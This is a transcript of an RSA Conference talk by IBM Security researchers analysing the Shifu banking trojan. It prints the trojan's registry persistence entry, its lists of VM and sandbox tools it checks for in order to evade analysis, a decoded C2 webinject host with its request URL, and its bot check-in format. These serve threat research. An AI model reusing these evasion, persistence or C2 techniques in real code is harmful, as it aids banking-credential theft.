executive security advisor cybercrime collaboration - … id: #rsac tal darsan cybercrime...
TRANSCRIPT
SESSION ID:
#RSAC
Tal Darsan
Cybercrime Collaboration - The Changing APAC Threat Landscape
TTA1-F01
Threat Research Team LeaderIBM Security
Etay MaorExecutive Security AdvisorIBM Security
#RSAC
Agenda
Intro – collaboration and localization
Deep dive into Shifu
The dark web
What do we do next?
#RSACIt’s Not Just About Bank Accounts and Card Data
Cybercriminals are always looking for other ways to monetize
Example - Healthcare:
Seller:
Easier to steal
More profitable than a credit card
Buyer:
Harder to detect
Many opportunities
#RSAC
Localizing malware to APAC
Choosing specific targets
Local malvertizing or spamming services
Knowledge of internal procedures of local entities
Localized content using language
Localized injections using injection shops
Local money mules
#RSAC
Shifu trojan introduction
Introduced by IBM Security / Trusteer on August 2015
Active in the wild since mid 2015
Firstly focused on Japan then eastern Europe financial institiutions
Shares code portions of Shiz and Zeus
Shares characteristics of Gozi and Dridex
#RSAC
Main features
Domain generation algorithm
Theft from bank apps
Anti research
Stealth
Webinjects configurations
Wipe system restore
#RSAC
Main features
Anti research, VM and sandbox tools
Browser hooking and web injects parser
Keylogger
Bitcoin wallet stealer
Screenshot grabber
Certificate grabber
Endpoint classification and monitoring applications of interest
RAT and bot control module
#RSAC
Shifu’s Infection Chain
VM
1. Drops a copy of itself under %APPADATA% -> <payloads random name>.exe
2. Writing a Windows registry Persistence entry:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent{Decimal Number}Data = rundll32.exe shell32.dll, ShellExec_RunDLL <payloads random name>.exe
3. Drops an Apache server
4. Drops a financial web-injects configuration
Angler EK
#RSAC
Shifu main function
Delete ZoneIdentifier flag that the OS places near the file downloaded from
the Internet to mark it's origin
Mark bitness of OS
Call a function CRC32 value to - make sure a particular process is not
present. If it is – execution stops
Checks for Smart-Card token presence to ensure it’s availability in order to
operate correctly, in case it is present, it will pass the main “Anti Research”
validation function
Calls further anti research functions
#RSAC
Shifu’s Anti Research Address Stored CRC32 Process name.data:0040B120 dd 278CDF58h ; vmtoolsd.exe.data:0040B124 dd 99DD4432h ; vmwareuser.exe.data:0040B12C dd 6D3323D9h ; vmusrvc.exe.data:0040B130 dd 3BFFF885h ; vmsrvc.exe.data:0040B134 dd 64340DCEh ; vboxservice.exe.data:0040B138 dd 63C54474h ; vboxtray.exe.data:0040B13C dd 2B05B17Dh ; xenservice.exe.data:0040B144 dd 77AE10F7h ; wireshark.exe.data:0040B148 dd 0CE7D304Eh ; dumpcap.exe.data:0040B158 dd 0E90ACC42h ; idag.exe.data:0040B15C dd 4231F0ADh ; sysanalyser.exe.data:0040B160 dd 0D20981E0h ; shift_hit.exe.data:0040B174 dd 6AAAE60h ; idaq.exe.data:0040B178 dd 5BA9B1FEh ; procmon.exe.data:0040B17C dd 3CE2BEF3h ; regmon.exe.data:0040B180 dd 0A945E459h ; procexp.exe.data:0040B184 dd 877A154Bh ; peid.exe.data:0040B188 dd 33495995h ; autoruns.exe.data:0040B194 dd 9305F80Dh ; imul.exe.data:0040B198 dd 0C4AAED42h ; emul.exe.data:0040B19C dd 14078D5Bh ; apispy.exe.data:0040B1B0 dd 2AAA273Bh ; joeboxserver.exe.data:0040B1B4 dd 777BE06Ch ; joeboxcontrol.exe
VM
#RSAC
Shifu’s Anti Research
1. Check the presence of the following DLLs in loaded modules/DLL's:• sbiedll.dll • dbghelp.dll • api_log.dll • dir_watch.dll • pstorec.dll
2. Checks presence of the following folders and files on disk:• c:\analysis\sandboxstarter.exe • c:\analysis• c:\insidetm • c:\windows\system32\drivers\vmmouse.sys • c:\windows\system32\drivers\vmhgfs.sys• c:\windows\system32\drivers\vboxmouse.sys
3. Using Windows API functions NetServerGetInfo and NetWkstaGetInfo to receive current machine Network Group name and Domain respectively and compares it with the strings:• WORKGROUP• HOMEIf none of them fits - checks if function output is within Alphanumeric range of characters and whether it contains the string ANALYSERS
4. Calling the function "CompNamePresentAndNotBlacklisted" to make sure computer name doesn't include the following strings:• SANDBOX• FORTINET
VM
#RSAC
Shifu’s Apache Server
1. Shifu downloads an archive file, server.zip from its C2 server
2. server.zip contains an apache server which deployed in the victim’s machine
Purposes:
- Decrypting web injections Host, and receive injected JavaScript from a remote Shifu server
- Modular configuration component
- Innovative approach
#RSAC
Shifu’s Apache Server
To decode the address of remote webinjects server “secure.7375626a6563746472697665722e62697a.moz”
The server perform the hex to text conversation In this case:
7375626a6563746472697665722e62697a = subjectdriver.biz
Replay request to C2 with correct webinjects server:
subjectdriver.biz/?c=script&v=1&b=SECUSER!WIN7X86SP1!E78ACB41&r=[bank-injection-token]
#RSAC
botid=%s&ver=%s.%u&up=%u&os=%u<ime=%s%d&token=%d&cn=%s&av=%s&dmn=%s
Some of Shifu’s known bot commands are:
Communication
#RSAC
MultiCash and MultiCash@Sign – An electronic banking platform that serves
large corporations for the purpose of e-banking across the globe. MultiCash serves
customers all across Europe. Shifu hunts for access credentials to the
MultiCash@Sign plugin banks enable their major customers to use.
Elba5 – Electronic banking platform vendor serving the Austrian market. Shifu
hunts for Elba data that may be found on the infected machine.
HBP Hypo Office Banking – a platform that serves enterprise clients for the
purpose of e-banking via multiple bank accounts. HBP serves the Austria market.
Shifu hunts for HBP customer profile data.
Applications
#RSAC
• iexplore.exe
• opera.exe
• firefox.exe
• chrome.exe
• maxthon.exe
• java.exe
• javaw.exe
• plugin-container.exe
• acrobat.exe
• acrod32.exe
URLDownloadToFile
HTTPS
SIGNEDfile.exe
infected.exx
File inspection
#RSAC
Conclusions
Threat actors are reusing tools and techniques
They are using customization services to target specific regions
Cybercrime intelligence collection is not limited to anti-malware tools – process and procedures are scrutinized
Malware is AV, research AND malware aware
Cybercrime skill gap compression!!!